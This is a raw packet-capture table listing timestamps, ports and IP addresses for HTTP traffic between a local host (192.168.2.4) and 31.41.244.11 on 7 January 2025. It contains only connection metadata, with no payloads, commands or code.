Jan 7, 2025 10:09:01.792968988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792979956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792989969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.792989969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793001890 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793010950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793034077 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793060064 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793087959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793098927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793107986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793118954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793129921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793139935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793152094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793154955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793164015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793195963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793195963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793212891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793236971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793304920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793320894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793332100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793342113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793368101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793390036 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793396950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793407917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793417931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793430090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793442011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793461084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793461084 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793498039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793523073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793534994 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793545008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793555021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793565989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793571949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793584108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793616056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793616056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793616056 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793638945 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793729067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793744087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793754101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793764114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793776035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793785095 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793786049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793800116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793811083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793812037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793824911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793853045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793864012 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793864965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793878078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793890953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793909073 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793952942 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.793967962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793979883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.793991089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794003010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794049978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.794049978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.794564962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794575930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794588089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794599056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794610023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794620991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794632912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.794648886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.794666052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.794692993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.794991016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795001984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795011997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795047998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795083046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.795084953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795098066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795109034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.795128107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.795149088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826224089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826246977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826258898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826304913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826312065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826318026 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826340914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826384068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826386929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826400995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826412916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826426983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826457977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826463938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826476097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826488018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826504946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826504946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826531887 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826533079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826548100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826560020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826571941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.826610088 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.826625109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.830966949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831018925 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831029892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831043005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831073999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.831080914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831094980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831106901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.831115961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.831146955 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.831717968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.852859020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.852925062 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.852931023 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.852945089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.852958918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.852988958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.853030920 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.853096008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.853108883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.853121996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.853152037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.853212118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.878894091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878914118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878922939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878941059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878952980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878968000 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.878983974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.878988981 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879018068 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879029989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879045963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879066944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879072905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879074097 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879084110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879101992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879122019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879126072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879137039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879146099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879172087 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879189014 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879211903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879223108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879232883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879240990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879256010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879267931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879281998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879281998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879344940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879344940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879359007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879369020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879379034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879415989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879415989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879458904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879468918 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879477978 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879488945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879503965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879504919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879542112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879554987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879584074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879594088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879602909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879614115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879631042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879661083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879671097 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879682064 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879690886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879695892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879703999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879712105 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879738092 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879761934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879781008 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879791021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879800081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879810095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879818916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879834890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879848003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879861116 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.879879951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879890919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879970074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879980087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.879988909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880000114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880014896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880014896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880031109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880111933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880122900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880132914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880142927 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880155087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880163908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880173922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880183935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880201101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880201101 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880228996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880244017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880254030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880255938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880266905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880297899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880317926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880330086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880345106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880354881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880364895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880373955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880403042 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880417109 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880505085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880515099 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880527973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880537987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880548000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880557060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880568981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880577087 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880584002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880629063 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880630970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880644083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880666971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880667925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880705118 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880711079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880736113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880755901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880759001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880769968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880801916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880801916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880815983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.880846024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.880875111 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881108999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881118059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881136894 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881166935 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881167889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881181955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881191015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881192923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881202936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881227970 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881232023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881242990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881269932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881269932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881303072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881591082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881608009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881617069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881639004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881660938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881664991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881675959 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881694078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881702900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881752968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881752968 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.881781101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881789923 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.881840944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913064957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913084030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913091898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913121939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913146019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913166046 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913167000 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913181067 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913228989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913254976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913265944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913275957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913316965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913316965 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913327932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913337946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913347006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913357973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913367033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913379908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913398027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913408041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.913418055 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.913476944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.917828083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917839050 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917859077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917869091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917881012 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917891979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917898893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.917916059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.917962074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.917963028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.939795017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939805984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939815998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939826965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939835072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939846039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939856052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939878941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.939893007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.939934015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:01.965722084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965734005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965795040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:01.965805054 CET	80	50017	31.41.244.11	192.168.2.4
